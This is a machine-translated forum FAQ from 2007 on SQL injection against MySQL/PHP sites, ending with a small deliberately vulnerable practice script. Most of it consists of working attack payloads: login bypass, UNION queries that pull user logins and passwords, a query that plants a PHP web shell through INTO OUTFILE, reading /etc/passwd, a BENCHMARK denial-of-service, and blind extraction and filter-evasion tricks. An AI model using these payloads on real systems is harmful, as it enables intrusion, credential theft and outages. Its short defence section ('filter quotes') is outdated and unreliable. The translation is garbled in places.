Author Articles - SQL Injection Full FAQ - ANTICHAT - Security Online Community

2019/4/14 Author articles - SQL injection full FAQ | ANTICHAT - Security online community
  LOG IN
Site promotion: * Conclusion in the TOP 10 I and G , raising the X , 3000+ reviews *
 INFO Articles  
Author's articles SQL injection full FAQ

1 2 3 4 5 6
→ 13 Next>
7 Jul 2007 #1
Dr.Z3r0
Leaders of the World
SQL injection full FAQ
Author: Dr.Z3r0
Article postponed tordot.org
Please pay attention, here is the old version of this article and it will not be more
complete.
0.INTRO
0.1 Introduction
Laziv on the Internet in search of at least some information onSQL injection, you,
probably, often came across articles either very short, or not clear, or covering one topic,
or something else, which of course did not suit you. Once, I also collected somewhere
10-20 articles on this topic in order to penetrate into many subtleties of this vulnerability.
And remembering those times, I decided to write a complete FAQ on this topic so that,
so to speak, the others would not suffer. Those who find that I missed something, where
I made a mistake, etc., please write below, it’s difficult, after all, to keep everything in
my head . By the way, this is my first article, please do not throw tomatoes, and do
not kick your feet.
For the assimilation of this article requires:

a) The presence of brains
b) Direct hands
c) Knowledge of the SQL language
Basically this article was written as for MYSQL + PHP.
In general, in my opinion, the best way to learn how to work correctly with SQL
https://forum.antichat.ru/threads/43966/ 1/30
injection is not to read this article, but to lively practice , for example, to write a  LOG IN
vulnerable script yourself or use my one given at the very end.
By the way, I advise you to read everything as there is something important for the next
item, etc.
And further. When reading, please note that this article is 2007, and it is a bit outdated.
Now (April 2010) I am trying to rewrite it in order to restore relevance.
0.2 General Description

First we need to imagine what the database and scripts are, why we need them and so
on.
Take for example the engine of this forum. From the user’s side it’s all beautiful. Given
the subject of the article, you should ask the question, where does the engine get the
information (even the same article, these letters)? Right! From the database!
Roughly speaking, the usual, in our understanding, database consists of a set of tables.
Each table, of course, has columns and rows. Actually, this is a key point. Take for
example the table of users of this forum. For each user, several parameters should be
described (nickname, soap, date regi, etc.). As a result, each column defines some
parameter of the users, and each row defines a specific user. And at the intersection of
the column and row we need, there will be information about the parameter of the
desired user.
(in general, it is an exaggerated description of relational databases, you can search for
details)
So I hope to understand the presentation. Now let's talk about the interaction with the
databases. To work with the database, a special SQL query language was developed (by
the way, I would advise you to look for a manual on it, it will be useful).
In general, let's start with an example.

Imagine that you (script) went to the store (DB) and ask (SQL query) of the seller: "
Give one bottle of vodka for 200 rubles ."
Let's try to present the query in the form of SQL:
Code:
SELECT product FROM store WHERE (type = 'vodka' AND price = '200') LIMIT 1
Actually, in response to your request (SQL request), you (the script) receive a bottle
(information), and the seller (Database) no longer cares what you will do with it, since it
did its job. You can drink it, pour it, donate (process, withdraw, calculate) and so on.
0.3 What is SQL injection all the same?

Generally, an SQL injection attack occurs if an attacker can somehow modify the query to
the database.
It is easier to disassemble using examples, so we’ll go back to the shop example.
  LOG IN
Let's say you quit drinking. So you decided to go to the store for yogurt, and specially
wrote on a piece of paper " one packet of yogurt for 30 rubles"so as not to forget
why you came to the store. But you have an alcoholic friend (hacker, he is an attacker)
who corrected the inscription on a piece of paper (conducted a SQL injection attack) on
such" one kefir package for 30 rubles or one bottle of vodka for 200 rubles ".
As a result, you come to the store and say, using a piece of paper (incoming
parameter):" Give one packet of kefir for 30 rubles or one bottle of vodka for 200
rubles "
SELECT product FROM store WHERE (type = 'kefir' AND price = ' 30 ') OR (type = 'vodka' AND price =
'200 ') LIMIT 1
The seller, thinking that going further than the fridge with kefir than to the shelf with
vodka, gives you a bottle. And you with a clear conscience go home, where your
alcoholic friend is already waiting for you, pleased with the result))
Here is the actual SQL injection example. Here there is a lack of filtering incoming
parameters, you did not look at the fact that the second part of the note is written in
another handwriting?
Of course, this is all exaggerated, but I hope the idea of SQL queries and injections into
these queries you caught.
Last edited: Sep 6, 2011
letsgo , conschtebl , sashka3076 and 77 others like this.
7 Jul 2007 #2
Dr.Z3r0
1. HOW TO FIND SQL INJECTION

As you understood above, SQL injection can occur in places where there are any
incoming parameters, be it the number of news / article you want to see on the site, or a
voting questionnaire, in general any parameter received from the user. And it will occur
when this parameter is not filtered properly.
Having understood this thought, you will understand that it is very easy to find a SQL
injection. It is necessary to insert single and double quotes in all fields, variables and
cookies.
1.1 The first case (String incoming parameter)
Let's start with this scripthttp: //xxx/news.php? Id = 1 . Suppose that the original
query to the database looks like this:
Code:
 SELECT * FROM news WHERE id = '[COLOR = DarkOrange] 1 [/ COLOR]'  LOG IN
Now we will add a quotation mark to the "id" variable, like this http: //xxx/news.php?
Id = 1 '
And, if the variable is not filtered, our query to the database will look like this:
Code:
SELECT * FROM news WHERE id = '[COLOR = DarkOrange] 1' [/ COLOR] '
Here we see a violation of the syntax and logic of the SQL query, and, as a result, the
database will not be able to correctly process such a query.
If you include error messages it will come out something like:

mysql_query (): You have an error in your the SQL syntax check the manual That
Corresponds to your the MySQL server version for the right syntax to use near ' 1' '
if an error report off the in this case, you can determine the presence of vulnerabilities
like this (would also not prevent it, which would not be confused with paragraph 1.2 As it
is described in the same paragraph.): http: //xxx/news.php id =? 1 '- that there is a
query to the database will be like this:
Code:
SELECT * FROM news WHERE id = '[COLOR = DarkOrange] 1' - [/ COLOR] '
(For those who are in the tank “-“ this is the sign of the beginning of the comment,
everything after it will be discarded, I also want to draw your attention to the fact that
after it there must be a space (This is written in the MYSQL documentation) and, by the
way, too).
Thus, the request for MYSQL remains the same and displays the same as for http:
//xxx/news.php? Id = 1 The
entire paragraph 2 is devoted to what to do with this vulnerability.
1.2 Second case (Numeric input parameter)
Let's return to the news script . From the SQL language, we must remember that
numeric parameters can ( may be a keyword, since nothing does not prevent the
programmer from using the parameter with quotes ) is not framed with quotes, that is,
with such a call to the scripthttp: //xxx/news.php? id = 1 query to the database can
(!) look like this:
Code:
SELECT * FROM news WHERE id = [COLOR = DarkOrange] 1 [/ COLOR]
You can also detect this injection by inserting quotes into the 'id' parameter and then we
will see the error message:
mysql_query (): 1 ' '
If this message is not present, then there are three options:
1. Quotation filtered
 2. Error Reporting Off  LOG IN

3. There is no injection
To determine if the quote is filtered, you can enter http: //xxx/news.php? Id = 1

blablabla. The
DB will not understand this for blah blah blah and will give an error message like:
mysql_query (): You have an error in your SQL syntax check the manual that
corresponds to your MySQL server version for the right syntax to use near ' 1 blablabla '
If error Reporting is off then check like this http: //xxx/news.php id =? 1 -

You should see exactly as well as http: //xxx/news.php? id = 1
1.3 The third case (Authorization)
What to do if in the same authorization script there is no quotation check? IMHO it would
be at least stupid to use this injection to display some sort of information. Let the query
to the database be of the type:
Code:
SELECT * FROM users WHERE login = 'Admin' AND pass = '123'
Unfortunately, the password '123' does not fit , but we have found an injection in the
'login' parameter and in order to register under the nickname 'Admin' we need to enter
something like this Admin instead - that is, the part with the password check is discarded
and we we enter under the name 'Admin'.
Code:
SELECT * FROM users WHERE login = '[COLOR = DarkOrange] Admin' - [/ COLOR] 'AND pass =' 12
And now what to do if the vulnerability in the 'pass' field. We enter the following in this
field 123 'OR login =' Admin '- . The request will be as follows:
Code:
SELECT * FROM users WHERE login = 'Admin' AND pass = [COLOR = DarkOrange] '123' OR login =
That for a DB it will be absolutely independent to such request:
Code:
SELECT * FROM users WHERE (login = 'Admin' AND pass = '123') OR (login = 'Admin')
And after these actions, we will become the full owner of the account with the login
name 'Admin'.
1.4 The fourth case (Operator LIKE)
In SQL there is a operator LIKE . It is used to compare strings. Here we allow the
authorization script when entering a username and password requests information 

from
LOG IN
the database like this:
Code:
SELECT * FROM users WHERE login LIKE 'Admin' AND pass LIKE '123'
Even if this script filters the quote, it still remains vulnerable to injection. Instead of the
password, we just need to enter "%" (For the LIKE operator, the "%" character matches
any string) and then the query will become
Code:
SELECT * FROM users WHERE login LIKE 'Admin' AND pass LIKE '%'
and let us go inside with the login 'Admin'. In this case, we not only found SQL injection
but also successfully used it.
Now you can go to paragraph 2.
2. WHAT AND WHERE CAN YOU EXPLAIN FROM THIS USEFUL
Then only the type of vulnerability described in section 1.1 will be considered, and you
can redo the others yourself, it is not difficult
2.1 UNION Team

The most useful, in our case, is the command UNION (who does not know to google ) ...
If in a nutshell, then it merges two requests into one. And this is very useful, since you
can specify almost completely your query to the database, for example, to display
information from any table.
Modifying script accesshttp: //xxx/news.php? id = 1 'UNION SELECT 1 - . We get

the query to the database like this:
Code:
SELECT * FROM news WHERE id = [COLOR = DarkOrange] '1' UNION SELECT 1 - [/ COLOR] '
2.1.1.1 Selection of the number of fields (Method 1 - UNION operator )
The fact is that the number of columns before and after UNION must match, and an error
will probably come out (unless there is one column in the news table
): Used SELECT statements have a different number of columns
In this case, we need to select the number of columns (so that their number beforeand
after theUNION wouldmatch). We do it like this:
http: //xxx/news.php? Id = 1 'UNION SELECT 1, 2 -

Error. "The used SELECT statements have a different number of columns"
http: //xxx/news.php? Id = 1 'UNION SELECT 1,2,3 -
Error again.  LOG IN

...
http: //xxx/news.php? id = 1 'UNION SELECT 1,2,3,4,5,6 -

Oh! It was displayed exactly the same way as http: //xxx/news.php? Id = 1
means the number of fields is selected, that is, there are 6 of them ...
2.1.1.2 Selection of the number of fields (Method 2 - GROUP BY Operator )
And this method is based on the selection of the number fields using GROUP BY . That is
a request of this type:
http: //xxx/news.php? Id = 1 'GROUP BY 2 -
It will be displayed without errors if the number of fields is less than or equal to 2.
We make a request of this type:
http: // xxx / news. php? id = 1 'GROUP BY 10 -
Oops ... There was a type error.

mysql_query (): Unknown column '10' in 'group statement'
So there are fewer columns than 10. We divide 10 by 2. And we make a query
http: //xxx/news.php? id = 1 'GROUP BY 5 -
Oops! There is no error - it means that the number of columns is greater than or equal
to 5 but less than 10. Now we take the average value between 5 and 10, it turns out
like 7. Do the query:
http: //xxx/news.php? Id = 1 'GROUP BY 7 -
Oh, again, an error ...

mysql_query (): Unknown column '7' in 'group statement'
Doesthis mean more or equal to 5 but less than 7. Make another request
http: //xxx/news.php? Id = 1 ' GROUP BY 6 -
No errors ...greater than or equal to 6 but less than 7. It follows that the required
number of columns is 6.
2.1.1.3. Selection of the number of fields (Method 3 - ORDER BY )
The same principle as in clause 2.1.1.2 only uses the ORDER BY function . And the error
text slightly changes if there are more fields.
mysql_query (): Unknown column '10' in 'order clause'
2.1.2 Definition of displayed columns
I think that for many of us exactly such a page like http: //xxx/news.php? id = 1
does not suit. So we need to make sure that nothing is output on the first request
(before UNION ). Roughly speaking, you need to cut off the output from the first request.
The easiest way is to change the "id" from '1' to '-1' (or to '9999999'):  LOG IN
http: //xxx/news.php? Id = -1 'UNION SELECT 1,2,3,4,5, 6 -
Or add a false condition:

http: //xxx/news.php? Id = 1 'AND 1 = 0 UNION SELECT 1,2,3,4,5,6 -
Now we have some where in the page should be displayed any of these numbers. (For
example, since this is conditionally a news script, then in the “News title” it will be
displayed, let's say 3, “News” -4 and so on). Now, in order for us to get some
information, we need to replace these numbers in the application to the script with the
functions we need. If the digits are not displayed anywhere, then most likely the
conclusion is missing and the remaining subclauses of clause 2.1 can be skipped.
2.1.3 SIXSS (SQL Injection Cros Site Scripting)
This same XSS, it is only carried out through a request to the database. Example:
http: //xxx/news.php? Id = -1 'UNION SELECT 1,2,3,' <script> alert ('SIXSS')
</ script> ', 5,6 - Well, I think not understand it’s difficult that 4 in the page will be
replaced by <script> alert ('SIXSS') </ script> and accordingly the exact same XSS
will turn out.
2.1.4 Column / table names
If you know the names of tables and columns in the database, you can skip this item.
If you do not know ... There are two ways.
2.1.4.1 Names of columns / tables if you have access to INFORMATION_SCHEMA and if the
version MYSQL> = 5 The
table INFORMATION_SCHEMA.TABLES contains information about all the tables in the

database, the column TABLE_NAME is the names of the tables.
http: //xxx/news.php? id = -1 'UNION SELECT 1,2,3, TABLE_NAME, 5,6 FROM
INFORMATION_SCHEMA.TABLES - This is where the problem may appear. Since only
the first line of the database response will be displayed. Then we need to use LIMIT like
this:
Output the first line:

http: //xxx/news.php? Id = -1 'UNION SELECT 1,2,3, TABLE_NAME, 5,6 FROM
INFORMATION_SCHEMA.TABLES LIMIT 0,1 -
The output of the second line:

http: //xxx/news.php? Id = -1 'UNION SELECT 1,2,3, TABLE_NAME, 5,6 FROM
INFORMATION_SCHEMA.TABLES LIMIT 1,1 - etc.
Well, we found the Users table. Only this ... ahem ... the columns don't know ... Then
the INFORMATION_SCHEMA.COLUMNS table comes to the rescueThe column
COLUMN_NAME contains the name of the column in the table TABLE_NAME . This is
how we retrieve the column names.
http: //xxx/news.php? id = -1 'UNION SELECT 1,2,3, COLUMN_NAME, 5,6 FROM
INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME =' Users' LIMIT 0.1 -
  LOG IN
http: // xxx / news.php? id = -1 'UNION SELECT 1,2,3, COLUMN_NAME, 5,6
FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME =' Users' LIMIT
1,1 -
etc.
And here we found the login , password fields .
2.1.4.2 The names of the columns / tables if there is no access to INFORMATION_SCHEMA
Unfortunately, the usual brute force comes into force here ... Example:
http: //xxx/news.php? Id = -1 'UNION SELECT 1,2,3,4, 5.6 FROMTable_name -
is necessary to select table_name until not disappear an error like:

mysql_query (): the Table ' table_name ' does not exist
Well, we have introduced, to the happiness,Users Offline, missing the error message,
and the page will appear as ifhttp : //xxx/news.php? id = -1 'UNION SELECT
1,2,3,4,5,6 - what does this mean? This means that there is aUserstableand you need
to start sorting the columns.
http: //xxx/news.php? id = -1 'UNION SELECT 1,2,3, Column Name , 5,6 FROM
Users -
It is necessary to select Column Name until the error message of the type disappears:
mysql_query (): Unknown column ' Columnname ' 'in' field list '
Where the error message disappears, it means such a column exists.
And this is how we learned that in the Users tablethere are login , password columns.
2.1.5 Information output Accessing the
script in this way http: //xxx/news.php? Id = -1 'UNION SELECT 1,2, login,

password, 5,6 FROM Users LIMIT 0,1 - Displays the login and password of the first
user from the Users table.
2.2 Work with Files

MYSQL server supports file management. Yes, it is somewhat flawed, but this is not a file
manager. To work with files, the current user must have rights to this, that is, FILE_PRIV.
2.2.1 Writing to a file
There is in MYSQL such an interesting function of type SELECT ... INTO OUTFILE that
allows you to write information to a file. Or, such a SELECT ... INTO DUMPFILE
construction is almost similar and you can use any.
Example: http: //xxx/news.php? Id = -1 'UNION SELECT 1,2,3,4,5,6 INTO

OUTFILE' 1.txt '-
  LOG IN
There are several limitations for it.
It is forbidden to overwrite files

Requires FILE privileges
(!) Mandatory true quotes in specifying the file name
But what would prevent us from making the web go? For example:
http: //xxx/news.php? Id = -1 'UNION SELECT 1,2,3,' <? Php eval ($ _ GET
['e'])?> ', 5,6 INTO OUTFILE '1.php' -
It remains only to find the full path to the root of the site on the server and append it
before 1.php. In principle, you can find another error in the report which will see the
path on the server or leave it at the root of the server and pick it up with a local
connection, but this is another topic.
2.2.2 Reading Files
Consider the function LOAD_FILE
Example: http: //xxx/news.php? Id = -1 'UNION SELECT 1,2, LOAD_FILE (' etc /

passwd '), 4,5,6
There are also several for it restrictions.
The full path to the file must be specified.

Requires FILE privileges
The file must be on the same server.
The size of this file must be less than specified in max_allowed_packet
The file must be open for reading by the user from under which the MYSQL is
running.
If the function fails to read the file, it returns NULL.
2.3 DOS attack on SQL server
In most cases, SQL server is reached due to the fact that nothing else can be done. The
type could not recognize the tables / columns, no rights to it, no rights to it, etc. I’m
honestly against this method but still ...
Get to the point ...

The BENCHMARK function performs the same action several times.
Code:
SELECT BENCHMARK (100000, md5 (current_time))
That is, here this function does md5 (current_time) 100,000 times, which takes about
0.7 seconds on my computer ... It seemed like this ... And if you try the embedded
BENCHMARK ?
 Code:  LOG IN
SELECT BENCHMARK (100000, BENCHMARK (100000, md5 (current_time)))
It takes a very long time to be honest, I didn’t even wait ... I had to do a reset .
An example of Dos in our case:

http: //xxx/news.php? Id = -1 'UNION SELECT 1, 2, BENCHMARK (100000,
BENCHMARK (100000, md5 (current_time))), 4, 5, 6 -
Enough 100 times poke F5 and "the server will fall into a fast down"))).
Last edited: 27 Apr 2010
qwaszx000 , highmoore , conschtebl and 18 others like this.
7 Jul 2007 #3
Dr.Z3r0
3.WHAT DOES IT DO NOT DIRECT TO THE PAGE.
3.1 Reporting in the Error Report You

can find more details in the comments to the articleFast Blind SQL Injection (Qwazar)
The idea of this method is to try to find the output in the error report. That is,
dynamically transfer any substring to a muscle error.
In general, I see no reason to try to clarify the meaning and logic of the request,
honestly speaking, he barely doped himself)
Code:
SELECT COUNT (*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3) x GROUP BY CONCAT (MID ([B]
The disadvantage of this method is the impossibility to output your string longer than 63
characters at a time, and of course the need to include an error report display.
Actually, here's an example of how you can use this method:

http: //xxx/news.php? Id = -1 'OR (SELECT COUNT (*) FROM (SELECT 1 UNION
SELECT 2 UNION SELECT 3) x GROUP BY CONCAT (MID ( VERSION (), 1, 63),
FLOOR (RAND (0) * 2))) -
  LOG IN
As a result of the previous query, we will see an error like:
Duplicate entry ' 5.0.45-community-nt 0' for key 1
Keep in mind that the last zero in the line "5.0.45-community-nt0" does not apply to it,
and is the result of the execution of the FLOOR (RAND (0) * 2) command, without which
it would not be possible to provoke an error. And because of which we print 63 characters
instead of 64 characters, as it might have initially seemed.
3.2 Character-wise search
This case is needed if http: //xxx/news.php? Id = 1 with different id will give us

different results. For example http: //xxx/news.php? Id = 1 will be different from
http: //xxx/news.php? Id = 0 if not, then this method is useless, but it’s worth
reading until the end.
As we remember the query to the database from us looks like this
Code:
SELECT * FROM news WHERE id = '[COLOR = DarkOrange] 1 [/ COLOR]'
Now we modify it via the vulnerable id parameter before such a request (if we are
unfamiliar, go to step 5 and read):
Code:
SELECT * FROM news WHERE id = '[COLOR = DarkOrange] -1' OR id = IF (ASCII ((SELECT USER ()
Like this: http: //xxx/news.php? Id = -1 'OR id = IF (ASCII ((SELECT USER

()))> = 254,' 1 ',' 0 ') -
What does this give us ? To begin, MYSQL performs a SELECT USER () subquery into the
ASCII () function that returns the ascii code of the first character from the result of the
subquery, and the IF () function returns 1 if this code is greater than or equal to 100.
Code:
SELECT * FROM news WHERE id = '- 1' OR id = 1
and it is executed in the same way as when accessing the script http:
//xxx/news.php? id = 1 and if the code of this number is less then the main query
becomes
Code:
SELECT * FROM news WHERE id = '- 1' OR id = 0
and it is executed exactly the same way as with

http: //xxx/news.php? id = 0
Let's call it conditionally that the request returns 1 (yes) or 0 (no), respectively, and
 LOG IN
begin to iterate.
http: //xxx/news.php? id = -1 'OR id = IF (ASCII (SUBSTRING ((SELECT USER

()), 0.1)> = 100,' 1 ',' 0 ') -
Yeah returned 1 means the first character code is greater than or equal to 100. Try
this:

()), 0,1) > = 200, '1', '0') -
Returned 0 means 100 <= character code <200.
Http: //xxx/news.php? Id = -1 'OR id = IF (ASCII (SUBSTRING (( SELECT USER

()), 0,1)> = 150, '1', '
0 means 100 <= character code <150.

()), 0.1)> = 125,' 1 ',' 0 ') -
AND returned 0 means 100 <= character code <125.

()), 0.1)> = 113 , '1', '0') -
Returned 1 therefore
113 <= character code <125. Http: //xxx/news.php? Id = -1 'OR id = IF (ASCII

(SUBSTRING ((SELECT USER () ), 0,1)> = 118, '1', '0') -
Returns 0 therefore
113 <= character code <118. Http: //xxx/news.php? Id = -1 'OR id = IF ( ASCII

(SUBSTRING ((SELECT USER ()), 0,1)> = 115, '1',

()), 0.1) = 113,' 1 ',' 0 ') -
Returned 0 it means the character code is not equal to 113.

()), 0,1) = 114,' 1 ',' 0 ') -
Hooray! Returned 1 means the character code is equal to 114. Translate into a
character and get the character "r". Now go to the next character.
Http: //xxx/news.php? Id = -1' OR id = IF (ASCII (SUBSTRING ((SELECT USER

()), 2,1)> = 100, '1', '0')) -
And repeat all the previous steps again.
3.3 Binary search using BENCHMARK
What should I do if there are no displayed fields and error reporting is turned off? The
BENCHMARK function will come to our rescue . As it was written above, this function
performs one action several times. Well, what do you ask ... And that's what. Recall that
request
 Code:  LOG IN
SELECT BENCHMARK (100000, BENCHMARK (100000, md5 (NOW ())))
it is performed sooo long, and based on delays (no, do not be scared, not those delays
that you just thought) we will sort through some parameter, let’s the name of the user
under which we are connected to the database (the USER () function displays it ).

()), 1, 1)))> = 100, 1, BENCHMARK (2999999, MD5 (NOW ()))) - The
request will be as follows:
Code:
SELECT * FROM news WHERE id='[COLOR=DarkOrange]-1' OR id=IF(ASCII(SUBSTRING((SELECT USER()
And now, by analogy with the previous paragraph, we will go through the string USER ()
. Only in this case, instead of 0, the function will perform this request for a very long
time, which will tell us that the request returned 0 and, accordingly, if without any delay,
the request returns 1 .
Now let's talk about the delay time. In order to determine the return time of 0 and 1,
you must first make several requests:
http: //xxx/news.php? Id = -1 'OR id = IF (99> 100, 1, BENCHMARK ( 2999999
, MD5 (NOW () ))) -
Will return 0. Need to detect time. Depending on the width of your channel, you need to
pick the number 2999999 before the current , so that you can accurately judge whether
there was a delay or not compared to
http: //xxx/news.php? Id = -1 'OR id = IF (101> 100, 1, BENCHMARK
(2999999, MD5 (NOW ()))) -
which will return 1 .
A huge disadvantage is that BENCHMARK we very much load a server.
ATTENTION! In this case, the main thing is not to forget that after each BENCHMARK
execution, the SQL server needs to be given some time to rest. (Slightly more than the
BENCMARK execution itself ). Otherwise, the results of this search may be incorrect.
3.4 Character Bypass Using SLEEP

Well, we read about the benchmark. And everyone drew attention to the terrible
instability of this method. What do you ask? That's what. From the 5th MySQL branch ,
the SLEEP () statement appeared .
In fact, this function creates the delay we need in the response of the web server, and
note, without unnecessary loads on it. That is, SLEEP () is the best alternative to
BENCHMARK () and it is desirable to use it , but I repeat the only negative - this
function only appeared in the 5th branch. Tale, and only.
How to use? Everything is elementary:
http: //xxx/news.php? Id = -1 'OR id = IF (ASCII (SUBSTRING ((SELECT USER

 LOG IN
()), 1, 1)))> = 100, 1, SLEEP (3) ) -
I use the value in two to three seconds, but I advise you to choose it according to the
server channel, as errors in the output may occur.
3.5 Character-Wise Using Error Reporting
This item is written based on the article " New Benchmark Alternative or Effective Blind
SQL-injection " by Elekt , respect him.
This method is based on the fact that instead of returning 0 , a subquery is executed
which causes an error and it is possible to judge by the error output that it returned 0 ,
and by the absence of an error that it returned 1 . This method will help us if there are
no displayed fields, but the error report is turned ON (!) .
Code:
SELECT * FROM news WHERE id = '- 1' OR id = (SELECT 1 UNION SELECT 2)
What do you think that will return this request? The error is correct because the id is
compared with a subquery that returns two rows.
mysql_query (): Subquery returns more than 1 row
This was a theory. Now go to the query with the help of which we will iterate the
characters
Code:
SELECT * FROM news WHERE id = '[COLOR = DarkOrange] -1' OR id = IF (ASCII (SUBSTRING ((SEL
As can be seen from this query, if the character code is greater than or equal to 100,
the IF () function returns 1 , and then no error occurs, and if the function performs a
subquery
Code:
SELECT 1 UNION SELECT 2
which returns two lines that when comparing with id causes an error and we understand
that the request returned 0 .
A huge disadvantage of this method is the fact that huge amounts of errors accumulate
in the logs. A huge plus is the speed of work.
3.6 Injection in the ORDER BY operator
For some reason, many have formed the opinion that this is a hopeless case. Well, we
will change this opinion to the opposite. Suppose the query to the database looks like
 LOG IN
this:
Code:
SELECT * FROM news ORDER BY $ by
well, as always, the $ by variable does not pass filtering, and a few lines from the
database are displayed on the page. Well, we need to get two requests that would
somehow change the output to the page, but still the requests must be such so that we
can influence the result with the help of valid subqueries. What can such requests be
http: //xxx/news.php? By = (id * 1)
http: //xxx/news.php? By = (id * -1)
I hope you guessed the second time the sample will go "top to bottom" regarding the
first request, to understand why it is not difficult. Suppose for the first time it was
derived, we take it for the truth :
Code:
First news
Second news
Third news
And in the second lie :
Code:
Third news
Second news
First news
Well then, the query for the brut name of the current user will look like this:
http: //xxx/news.php? By = (id * IF (ASCII (SUBSTRING (USER (), 0.1)) =
112.1, -1) )
Well actually hatched reverse order news => false
http: //xxx/news.php by =? (id * the IF (the ASCII (the SUBSTRING (the USER
(), 0.1)) = 113.1, -1))
Again, a lie
http: //xxx/news.php? by = (id * IF (ASCII (SUBSTRING (USER (), 0,1)) =

114.1, -1))
Oh! Direct news order => true. We
translate the character code 114 into the character r. Go to the next character and so on.
4.WHAT TO DO IF SOMETHING IS FILTERED.
4.1 Filtered Space
Well, for a start, remember that for SQL a type / ** / construct is equal to a space.
  LOG IN
Well, what to do if a similar design is filtered? Everything is elementary. You can use
brackets and apostrophes. For example:
Code:
SELECT * FROM news WHERE id = '[COLOR = DarkOrange] 1'UNION (SELECT (1), 2,3,4,5, (6) FROM
Such a request will execute correctly.

(Just delete unnecessary, inadequate spaces - them, infection, inserts the forum)
4.2 Character / string filtered
There is an interesting function CHAR () that returns the character itself by the character
code. Suppose the character is filtered ... well, let it be an asterisk (*). First we need to
know the code of this symbol. In MYSQL, there is an ASCII () function that returns the
code of the leftmost character from the string passed to it, so
Code:
SELECT ASCII ('*')
only on a vulnerable host it makes no sense (the symbol '*' is filtered) it needs to be
done on LAN. We learn that the code is 42 and we use the function CHAR () so
Code:
SELECT CHAR (42, 42, 42)
Displays three asterisks.
Another way is to use hexadecimal character code. Now suppose that the admin
nightingale is filtered. In MYSQL, there is a HEX () function that produces the
hexadecimal code of a string. Yuzatsya so
Code:
SELECT HEX ('admin')
It will give out "61646D696E" ahead we add "0x" (To make SQL understand that it is
dealing with hexadecimal encoding) and we get "0x61646D696E" to use it without CHAR
() so
Code:
SELECT password FROM User WHERE login = 0x61646D696E
4.3 Problems with encodings

It often happens that you seem to have found all the columns made up the correct
query, and if you try to deduce any string from the database, well, depending on the
server configuration, you may receive a message about the incompatibility of encodings,
but you may not.
  LOG IN
There is an elementary way to put the conversion of encodings on the shoulders of the
muscle. You can use a similar construct:
AES_DECRYPT (AES_ENCRYPT ( [Your request] , 'bla' ), 'bla' )
But! Kakba is no longer fashionable and very cumbersome, and somewhere in the wilds
of this topic I offered a different design a few years ago, a much smaller one:
UNHEX (HEX ( [Your request] ))
As they say everything is ingeniously simple.

Well, actually an example of how this can be used:
http: //xxx/news.php? Id = - 1 'UNION SELECT 1,2,3, UNHEX (HEX (login)), 5,6
FROM Users LIMIT 0,1 -
5. USEFUL FUNCTIONS IN MYSQL
I hope that for SELECT, INSERT, UPDATE, DELETE, DROP you know, if not, then we climb
into this book to read: A great reference to the SQL language .
---------------------------- The
USER () function displays the user login under which we are connected to the MYSQL.
The
DATABASE () function displays the name of the database. to which we are connected
VERSION () displays the version of MYSQL
----------------------------
ASCII ( str ) returns the ASCII code of the first character in the string "str"
CHAR ( xx1, xx2, ... ) returns a string consisting of ASCII cosmic codes whose codes are
xx1, xx2, etc.
HEX ( str ) returns the hexadecimal equivalent of the string "str".
----------------------------
LENGTH ( str ) - Returns the length of the string "str".
SUBSTRING ( str, pos [, len] ) -Returns a substring of length len (if not specified, then to
the end of the string "str") characters from the string "str", starting from the position
pos.
LOCATE ( substr, str [, pos] )-Returns the position of the first occurrence of the substring
"substr" to the string "str" starting from the position pos (if not specified from the
beginning of the string "str"). If the substring "substr" in the string "str" is missing, it
returns 0.
----------------------------
LOWER ( str ) -translates to lower case string "str" (in my opinion only Latin)
CONCAT ( param1, param2, ... ) is the union of substrings into one string.
CONCAT_WS ( sep, param1, param2, ... ) is the union of the substrings into a single line
with the sep separator.
----------------------------
IF ( exp, ret1, ret2 )- Checks exp condition if it is true (not equal to 0) then returns the
string ret1 and if not, returns the string ret2.
------------------------------
expr BETWEEN min AND max -If the value of the expression expr is greater than or
equal to the specified value min and less than or equal to the specified value max, the
BETWEEN returns 1, otherwise - 0.  LOG IN

----------------------------
Now about comments in Mysql

1) # MySQL start comment character. Example:
Code:
SELECT pass, login FROM users [I] #This is comment [/ I]
which is similar to request
Code:
SELECT pass, login FROM users
2) - another version of the comment in MySQL. The space after this sign is required.
Example:
Code:
SELECT pass, login FROM users [I] - This is comment [/ I]
3) / * * / analogue comment SI in MySQL. Starting with the 5.1 (?) Branch, the lafa
ends and for this type of comments you need a closing part. For MySQL, the space is not
individual. Examples:
Code:
SELECT pass, login FROM users [I] / * This is comment [/ I]

SELECT pass, login [I] / * This is comment * / [/ I] FROM users
SELECT [I] / ** / [/ I] pass, login [I] / ** / [/ I] FROM [I] / ** / [/ I] users
4) / *! int * / Expansion of the previous comment. Everything enclosed in this

comment will be interpreted as a SQL query if the number of this version of MySQL is
equal to the specified number int after the exclamation mark or more. Example:
Code:
SELECT pass [I] / *! 32302, login * / [/ I] FROM users
Displays the login column if the MySQL version is equal to or higher than 3.23.02
. 6. HOW TO PROTECT FROM SQL INJECTION
You certainly understand what this entire article was written for this item. All items and their sub-items were
written only to understand the seriousness of the situation, and the author of this article is not responsible
for using these items for purposes contrary to the UKRF.
And the defense is very simple. By the way, all three rules apply to the three
methods of transmitting information to the server GET, POST, Cookie.
1) MOST IMPORTANT FILTERING QUOTS.

-------------------------------
2) If the string comparison operator LIKE is used, filter the characters “%” and “_” LOG IN
- -----------------------------
3) Do not use when comparing variables without quotes of the type SELECT ... WHERE id
= $ id and use so SELECT ... WHERE id = '$ id' and refer to paragraph 1
Last edited: 28 Apr 2010
conschtebl , inSa (Ne) rd , sukis and 14 others like this.
7 Jul 2007 #4
Dr.Z3r0
7.
ADDITIONS Free time was issued ... I don’t know if anyone needs it at all, but as
promised ...
Vulnerable script code
Code:
<? php
// Database Settings
$ script ['mysql_server'] = 'localhost'; // Host
$ script ['mysql_login'] = 'root'; // Login
$ script ['mysql_password'] = ''; // Password
$ script ['mysql_db'] = 'test'; // Database Name
// The script itself

$ body = "";
$ body. = "<html>
<head> <title> News </ title> </ head>
<body>
";
mysql_connect ($ script ['mysql_server'], $ script ['mysql_login'], $ script ['mysql_p
mysql_select_db ($ script ['mysql_db']) or die ('I can not connect to the database');
  LOG IN
Base dump
Code:
CREATE TABLE `news` (

ìd` int (11) NOT NULL default '0',
`date` varchar (8) NOT NULL default '',
`time` varchar (7) NOT NULL default '',
`caption` varchar (50) NOT NULL default '',
`text` text NOT NULL,
àvtor` varchar (50) NOT NULL default ''
